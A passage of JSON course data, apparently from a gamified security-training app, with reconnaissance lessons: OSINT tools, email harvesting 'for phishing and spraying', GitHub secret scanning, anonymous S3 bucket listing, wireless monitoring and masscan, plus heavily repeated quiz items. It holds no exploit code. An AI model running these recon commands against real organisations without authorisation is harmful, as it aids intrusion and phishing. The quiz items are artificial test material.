IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"osint-fw","cat":"Reconnaissance","title":"OSINT Frameworks","diff":2,"xp":150,"intro":"Automate intelligence gathering.","sections":[{"type":"text","content":"Maltego, SpiderFoot, recon-ng aggregate OSINT."},{"type":"code","lang":"bash","content":"recon-ng\nmodules load recon/domains-hosts/google_site_web"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Visual OSINT graphs?","opts":["recon-ng","Maltego","theHarvester","subfinder"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"email-harv","cat":"Reconnaissance","title":"Email Harvesting","diff":1,"xp":75,"intro":"Collect email addresses.","sections":[{"type":"text","content":"Find valid emails for phishing and spraying."},{"type":"code","lang":"bash","content":"theHarvester -d example.com -b google,bing -l 500"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Common email format?","opts":["user@","first.last@","firstl@","random@"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"tech-fp","cat":"Reconnaissance","title":"Tech Fingerprinting","diff":1,"xp":75,"intro":"Identify the tech stack.","sections":[{"type":"text","content":"CMS, framework, server, language identification."},{"type":"code","lang":"bash","content":"whatweb https://example.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Header revealing server?","opts":["Content-Type","Server","Accept","Host"],"ans":1},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"github-recon","cat":"Reconnaissance","title":"GitHub Recon","diff":2,"xp":125,"intro":"Find leaked secrets on GitHub.","sections":[{"type":"text","content":"Devs commit API keys, passwords to public repos."},{"type":"code","lang":"bash","content":"trufflehog git https://github.com/target/repo"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Scans git history for secrets?","opts":["nmap","TruffleHog","Burp","Metasploit"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"cloud-recon","cat":"Reconnaissance","title":"Cloud Infrastructure Recon","diff":2,"xp":150,"intro":"Discover S3 buckets, Azure blobs.","sections":[{"type":"text","content":"Misconfigured cloud resources leak data."},{"type":"code","lang":"bash","content":"aws s3 ls s3://company-backup --no-sign-request"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Most misconfigured AWS service?","opts":["EC2","S3","RDS","Lambda"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"meta-analysis","cat":"Reconnaissance","title":"Metadata Analysis","diff":1,"xp":75,"intro":"Extract hidden document metadata.","sections":[{"type":"text","content":"Documents contain author names, software versions, GPS."},{"type":"code","lang":"bash","content":"exiftool document.pdf"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Best metadata tool?","opts":["strings","ExifTool","file","binwalk"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"wireless-recon","cat":"Reconnaissance","title":"Wireless Recon","diff":2,"xp":125,"intro":"Discover wireless networks.","sections":[{"type":"text","content":"SSIDs, encryption, clients, signal strength."},{"type":"code","lang":"bash","content":"sudo airmon-ng start wlan0\nsudo airodump-ng wlan0mon"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Required card mode?","opts":["Managed","Monitor","Ad-hoc","Master"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"masscan","cat":"Reconnaissance","title":"Masscan Fast Scanning","diff":2,"xp":125,"intro":"Scan millions of hosts fast.","sections":[{"type":"text","content":"Masscan uses its own TCP/IP stack for speed."},{"type":"code","lang":"bash","content":"sudo masscan 10.0.0.0/16 --top-ports 100 --rate 10000"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Why is masscan fast?","opts":["Algorithms","Own TCP/IP stack","GPU","Cloud"],"ans":1},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"vuln-scan","cat":"Reconnaissance","title":"Vulnerability Scanning","diff":2,"xp":125,"intro":"Automated vuln detection.","sections":[{"type":"text","content":"Detect known vulns, misconfigs, missing patches."},{"type":"code","lang":"bash","content":"nuclei -u https://example.com -severity critical,high"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"YAML template scanner?","opts":["Nessus","OpenVAS","Nuclei","Nikto"],"ans":2},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output 